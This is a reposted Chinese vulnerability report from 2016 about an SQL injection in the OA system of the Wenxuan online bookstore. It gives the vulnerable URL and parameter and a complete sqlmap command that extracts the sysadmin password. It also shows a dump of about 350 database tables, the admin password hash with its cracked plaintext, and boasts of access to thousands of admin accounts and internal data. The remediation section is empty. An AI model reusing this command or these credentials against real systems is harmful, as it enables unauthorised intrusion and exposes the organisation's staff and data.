频道栏目
首页 > 安全 > 网络安全 > 正文
文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)
2016-05-09 09:05:21           
收藏   我要投稿

 

今天下楼的时候顺便丢垃圾,丢垃圾的时候发现一个包装袋,上面写着文轩网。然后回来就测试了一下,没想到引发了一场场血案啊
 

oa.winxuan.com


 

https://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1



formid存在注入
 

1.png



350个库啊,因为sqlmap不能直接显示出来,还是找日记一个一个手动排列的,就冲我这精神给20分吧。
 

JSP
back-end DBMS: Oracle
Database: OAUSER

+--------------------------------+---------+

| Table                          | Entries |

+--------------------------------+---------+

|SCORE                          | 17936023 |

| PERMISSIONLINKDOCBASE          | 6342260 |

| LOG                            | 5749886 |

| PERMISSIONDETAILDOCBASE        | 5503371 |

| SCORETMP                       | 1244885 |

| PERMISSIONDETAILWORKFLOWBASE   | 304448  |

| PERMISSIONLINKWORKFLOWBASE     | 293734  |

| PERMISSIONRULEDOCBASE          | 262420  |

| PERMISSIONRULEWORKFLOWBASE     | 262310  |

| WORKFLOWSTEPFINISHED           | 183342  |

| WORKFLOWINFOFINISHED           | 180505  |

| WORKFLOWOPERATORSFINISHED      | 140586  |

| WORKFLOWLOGFINISHED            | 125355  |

| ATTACH                         | 66960   |

| DOCATTACH                      | 54522   |

| WORKFLOWSTEP                   | 39600   |

| WORKFLOWINFO                   | 39180   |

| CATEGORYLINK                   | 38055   |

| DOCBASE                        | 35292   |

| PASSWORDHISTORY                | 29312   |

| WORKFLOWLOG                    | 28212   |

| UFG7S2O41194588032176T         | 27140   |

| EVENT                          | 19384   |

| WORKFLOWBASE                   | 15421   |

| PERMISSIONLINKPORTALCHANNALS   | 15264   |

| PERMISSIONDETAILPORTALCHANNALS | 15249   |

| UFF7K8K61221633602612T         | 13844   |

| UFJ3W3S41221633547510T         | 13831   |

| UFL0X4U31236061379146T         | 12725   |

| UFG3W9A31191920098875T         | 12613   |

| LABEL                          | 11655   |

| UFG0Y5L41221633619659T         | 11579   |

| UFA1Z8W21221633655798T         | 9747    |

| UFH3E4W91191919765921T         | 8970    |

| RTXU                           | 8194    |

| UFC4K0G21221633874179T         | 8038    |

| FORMLAYOUTFIELD                | 7956    |

| SYSUSER                        | 7922    |

| LABEL_NEW                      | 7859    |

| HUMRES                         | 7855    |

| SYSUSER_BAK                    | 7844    |

| HUMRES_BAK                     | 7777    |

| WORKFLOWOPERATORS              | 7491    |

| UFW1C6R51221634541611T         | 6319    |

| RTXUN                          | 6146    |

| UFG7S2O41194588032176          | 5869    |

| UFF2G8A01191907781421T         | 5721    |

| HUMRES_BACK                    | 5572    |

| HUMRESTEMP                     | 5163    |

| STATIONINFO                    | 4112    |

| Z1                             | 3892    |

| DOCINDIV                       | 3743    |

| STATIONLINK                    | 3491    |

| FORMFIELD                      | 3029    |

| UFG3W9A31191920098875          | 2857    |

| UFD1I6Q41194245212565          | 2695    |

| CATEGORY                       | 2435    |

| SELECTITEM                     | 2397    |

| UFG9O1U31427268735994T         | 2397    |

| UFW1J9T61269934662222T         | 2344    |

| IF_HUMRES                      | 2226    |

| UFH3E4W91191919765921          | 2166    |

| UFF2G8A01191907781421          | 2114    |

| UFA1Z8W21221633655798          | 1899    |

| UFF7K8K61221633602612          | 1899    |

| UFC4K0G21221633874179          | 1896    |

| UFW1C6R51221634541611          | 1896    |

| UFG0Y5L41221633619659          | 1894    |

| UFJ3W3S41221633547510          | 1894    |

| UFL0X4U31236061379146          | 1740    |

| UFZ1I5F91427270259217T         | 1688    |

| IF_STATIONINFO                 | 1462    |

| ORGUNIT                        | 1332    |

| UFW4F2G21430722144985T         | 1322    |

| KHZSJ                          | 1262    |

| UFJ4I3S41200992843804T         | 1080    |

| UFA5Y7Z81200990289777T         | 1078    |

| UFL2N6H71200991289728T         | 1078    |

| UFY2Z9J91200993227970T         | 1078    |

| UFO5T9B31200993254436T         | 1077    |

| ORGUNITLINK                    | 1058    |

| UFN4Q0D91201065966034T         | 1054    |

| BOOKSHEET                      | 1050    |

| SAPQQ                          | 1032    |

| RTXP                           | 1000    |

| UFI2T4P31385011501902T         | 976     |

| ZZ                             | 963     |

| UFH4O4P21434439724854          | 955     |

| UFY3X5U21214977469835T         | 903     |

| BB                             | 789     |

| UFE3V0Z41436239651329T         | 752     |

| UNLOCKUSER                     | 698     |

| EXPORT                         | 677     |

| UFW1J9T61269934662222          | 640     |

| DR                             | 609     |

| NODEINFO                       | 592     |

| UFW4F2G21430722144985          | 539     |

| PIPENODESTYLE                  | 536     |

| UFT6Y0E21239169073156T         | 525     |

| REMINDLOG                      | 498     |

| RYDRXX_BAK                     | 459     |

| UFR8V0S31201592887615T         | 440     |

| REPORTFIELD                    | 437     |

| UFU4Q6L41193280564254T         | 433     |

| DOCTYPE                        | 394     |

| REFOBJLINK                     | 364     |

| FORMLAYOUT                     | 361     |

| DIVPOSITION                    | 360     |

| MAILACCOUNT                    | 348     |

| REMINDRECEIVEOBJ               | 337     |

| UFI2T4P31385011501902          | 336     |

| PERMISSIONLINKREPORTDEF        | 334     |

| PORTALMODULES                  | 325     |

| UFG9O1U31427268735994          | 319     |

| UFZ1I5F91427270259217          | 319     |

| PERMISSIONDETAILREPORTDEF      | 316     |

| PORTALCHANPARAMODULES          | 286     |

| UFA2Q4C21193281172154T         | 275     |

| MENU                           | 274     |

| MENUORG                        | 266     |

| PORTALMODULECONFIG             | 256     |

| SELECTITEMTYPE                 | 253     |

| REMARK                         | 252     |

| UFF8U9E81395122755353T         | 247     |

| UFE3V0Z41436239651329          | 243     |

| WBSTASKHISTORY                 | 235     |

| REPORTSEARCHFIELD              | 226     |

| PERMISSIONRULEREPORTDEF        | 211     |

| MYPERMITBAG                    | 210     |

| UFJ4I3S41200992843804          | 192     |

| UFA5Y7Z81200990289777          | 191     |

| UFL2N6H71200991289728          | 191     |

| UFO5T9B31200993254436          | 191     |

| UFY2Z9J91200993227970          | 191     |

| WBSDOCFLOW                     | 191     |

| UFN4Q0D91201065966034          | 188     |

| PERMISSIONRULEPORTALCHANNALS   | 173     |

| UFK5R2Q01193282788864T         | 167     |

| UFR8V0S31201592887615          | 167     |

| DELOBJ                         | 165     |

| IF_ORGUNIT                     | 163     |

| WBSTASK                        | 149     |

| FORMINFO                       | 147     |

| PORTALCHANPARAS                | 144     |

| RYDRXX_BAK_1222                | 138     |

| UFY7Y3C31209373252583T         | 131     |

| SYSRESOURCE                    | 126     |

| PAGEMENU                       | 117     |

| KMTOPIC                        | 115     |

| PORTAL                         | 107     |

| SYSUSERROLELINK                | 106     |

| UFP6J3X91262843817858T         | 104     |

| PIPEINFO                       | 102     |

| REMINDMESSAGEDETAIL            | 97      |

| REMINDSENDOBJ                  | 97      |

| UFY3X5U21214977469835          | 97      |

| KMMAPTOPICLINK                 | 94      |

| SYSPERMRESLINK                 | 93      |

| PERMITBAG                      | 92      |

| UFY3T6F71193289145697T         | 90      |

| SETITEM                        | 89      |

| HUMRESCUSTOMIZE                | 85      |

| FORMLINK                       | 84      |

| SUBJECT                        | 84      |

| TEMP3                          | 84      |

| UFS6J0V21186643740812T         | 80      |

| UFY7Y3C31209373252583          | 79      |

| SEARCHCUSTOMIZEOPTION          | 78      |

| TEMP1                          | 75      |

| TEMP2                          | 75      |

| CONTEMPFIELD                   | 74      |

| UFC4H0T11193280596918T         | 70      |

| HHH                            | 67      |

| PERMISSIONRULEPIPEINFO         | 65      |

| REFOBJ                         | 60      |

| WBSTASKTEMPLATE                | 60      |

| UFA2Q4C21193281172154          | 58      |

| UFM8L3N01210227759384T         | 58      |

| UFK5R2Q01193282788864          | 57      |

| UFC4H0T11193280596918          | 56      |

| UFU4Q6L41193280564254          | 56      |

| UFY3T6F71193289145697          | 56      |

| ADDRESSINFO                    | 51      |

| GYSZSJ                         | 51      |

| PERMISSIONLINKPROJECT          | 50      |

| PERMISSIONDETAILPROJECT        | 49      |

| UFQ9H8S71395725696697T         | 49      |

| UFB5N0R31434341886193          | 47      |

| UFG5H0M21319164636037T         | 47      |

| UFK4H5T01278382941766T         | 47      |

| PIPEACCREDIT                   | 46      |

| ORGUNITTYPE                    | 44      |

| UFT6Y0E21239169073156          | 44      |

| RYDRXX                         | 43      |

| UFM2Y4U41210226662879T         | 42      |

| REPORTDEF                      | 41      |

| SYSROLEPERMLINK                | 41      |

| UFE3W8V51196906858771          | 41      |

| UFE3W8V51196906858771T         | 41      |

| SELFCUSTOM                     | 37      |

| UFB9T5N81395985987280T         | 36      |

| UFO3X9Z31395725358932T         | 36      |

| AA                             | 35      |

| PORTALTOPIC                    | 35      |

| PORTALCHANNALS                 | 33      |

| UFE4O5K91191920595703T         | 33      |

| UFX6P3U41214807405359T         | 33      |

| UFP6J3X91262843817858          | 31      |

| UFS6J0V21186643740812          | 31      |

| UFF8U9E81395122755353          | 30      |

| UFE3Q6S51228892267536T         | 28      |

| UFK4H5T01278382941766          | 27      |

| GYSZSJ_BAK                     | 25      |

| PERMISSIONRULEPROJECT          | 24      |

| UFE3Q6S51228892267536          | 24      |

| UFT8H8N31319164144745T         | 23      |

| UFE4O5K91191920595703          | 22      |

| UFR9F9Z51276157442595          | 22      |

| UFR9F9Z51276157442595T         | 22      |

| AUTHORIZEOPERATION             | 20      |

| UFQ9H8S71395725696697          | 20      |

| KMMAP                          | 19      |

| UFM8L3N01210227759384          | 19      |

| SYSPERMS                       | 18      |

| SYSROLE                        | 18      |

| UFG5H0M21319164636037          | 18      |

| WORKFLOWAUTHORIZELOG           | 18      |

| UFU4M7L61205906651800T         | 16      |

| UFC2N9R01208923738836T         | 13      |

| FAVLIST                        | 12      |

| SETITEMTYPE                    | 12      |

| UFM2Y4U41210226662879          | 12      |

| UFQ0S2A91259133802297T         | 12      |

| UFX6P3U41214807405359          | 12      |

| USERMENU                       | 12      |

| UFB4P7W91208923277799T         | 11      |

| STATIONLEVELLINK               | 10      |

| REMINDRULE                     | 9       |

| UFJ8Z6G41426816778795T         | 9       |

| UFO3X9Z31395725358932          | 9       |

| UFT8H8N31319164144745          | 9       |

| VERSIONINFO                    | 9       |

| KHZSJ_BAK                      | 8       |

| PIPEDOCTYPE                    | 8       |

| UFB9T5N81395985987280          | 8       |

| UFC4B3Q21185525667890T         | 8       |

| UFQ0S2A91259133802297          | 8       |

| ADDRESSSHEETMAP                | 7       |

| SEARCHCUSTOMIZE                | 7       |

| UFH2S6L11237441705568T         | 7       |

| PORTALTOPICLINK                | 6       |

| PROJECT                        | 6       |

| UDTYPE                         | 6       |

| UFL7E7V61259822162376T         | 6       |

| UFP3K1Q01267680510921T         | 6       |

| UFU4M7L61205906651800          | 6       |

| WBSVERSION                     | 6       |

| ATTACHMENT                     | 5       |

| CONTEMPLATE                    | 5       |

| CONTRACTTYPE                   | 5       |

| KEYINFO                        | 5       |

| UFC3H4A91228892239311T         | 5       |

| UFC4B3Q21185525667890          | 5       |

| UFC4C3V21193888200526          | 5       |

| UFC4C3V21193888200526T         | 5       |

| UFG1K2C01237771698639T         | 5       |

| UFJ8Z6G41426816778795          | 5       |

| UFP3K1Q01267680510921          | 5       |

| PERMISSIONRULECUSTOMER         | 4       |

| PERMISSIONRULEPRODUCT          | 4       |

| PROJECTTYPE                    | 4       |

| UFC2N9R01208923738836          | 4       |

| UFL7E7V61259822162376          | 4       |

| UFT1Q4K71237184297382T         | 4       |

| UFW4W9S01237184235289T         | 4       |

| WORKFLOWAGENTINFO              | 4       |

| AUTHTICKETINFO                 | 3       |

| UFB4P7W91208923277799          | 3       |

| UFG9Z3X81392010172464T         | 3       |

| UFI3J3D61186471722328T         | 3       |

| UFJ6Y6W11319179657036          | 3       |

| UFZ3K0Z41237875272949T         | 3       |

| WBSINFO                        | 3       |

| WORKFLOWAUTHORIZE              | 3       |

| PERMISSIONDETAILCONTRACT       | 2       |

| PERMISSIONLINKCONTRACT         | 2       |

| PERMISSIONLINKCUSTOMER         | 2       |

| PERMISSIONLINKPRODUCT          | 2       |

| PERMISSIONRULECONTRACT         | 2       |

| REFOBJMODEL                    | 2       |

| UFD1Y7I61319173459654          | 2       |

| UFI3J3D61186471722328          | 2       |

| AAA                            | 1       |

| ASSETSTYPE                     | 1       |

| CUSTOMERTYPE                   | 1       |

| ID_RECODE_DONTDELETE           | 1       |

| MAP                            | 1       |

| PERMISSIONDETAILASSETS         | 1       |

| PERMISSIONDETAILCUSTOMER       | 1       |

| PERMISSIONDETAILPRODUCT        | 1       |

| PERMISSIONDETAILPROVIDER       | 1       |

| PERMISSIONLINKASSETS           | 1       |

| PERMISSIONLINKPROVIDER         | 1       |

| PERMISSIONRULEASSETS           | 1       |

| PERMISSIONRULEMODEL            | 1       |

| PERMISSIONRULEPROVIDER         | 1       |

| PRODUCTTYPE                    | 1       |

| PROVIDERTYPE                   | 1       |

| SHOPTYPE                       | 1       |

| UFC3H4A91228892239311          | 1       |

| UFD1Y7I61319173459654T         | 1       |

| UFE6F0Y01186643861921          | 1       |

| UFE6F0Y01186643861921T         | 1       |

| UFG1K2C01237771698639          | 1       |

| UFH2S6L11237441705568          | 1       |

| UFJ6Y6W11319179657036T         | 1       |

| UFS6Z2C81395646749424          | 1       |

| UFS6Z2C81395646749424T         | 1       |

| UFT1Q4K71237184297382          | 1       |

| UFV3W4W41395647003213          | 1       |

| UFV3W4W41395647003213T         | 1       |

| UFW4W9S01237184235289          | 1       |

| UFZ3K0Z41237875272949          | 1       |

+--------------------------------+---------+



因为表太多,不知道管理员账户是那个。可以利用语句直接在sqlmap中查询。

默认管理员是sysadmin
 

C:\Python27\sqlmap>sqlmap.py -u "https://oa.winxuan.com/ServiceAction/com.velcro.
base.GetDataAction?action=checkname&formid=1" -p formid --tamper=space2comment -
-batch -D zuzhibu -T sysuser --sql-query "select logonpass from sysuser where lo
ngonname='sysadmin'"


 

e3570e9e977fabb2ac818edc9a6a2e38



解密后为asdlkj321
 

1.png


 

1.png



5000名后台管理信息
 

1.png


 

1.png


 

1.png



小学管理系统,可以看视频等。。

大量敏感信息
 

1.png



点到即止,么么哒

点到即止,么么哒
 

1.png

 

解决方案:

 

点击复制链接 与好友分享!回本站首页
上一篇:时趣某APP一处Limit后注入(涉及700W+用户数据)
下一篇:金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站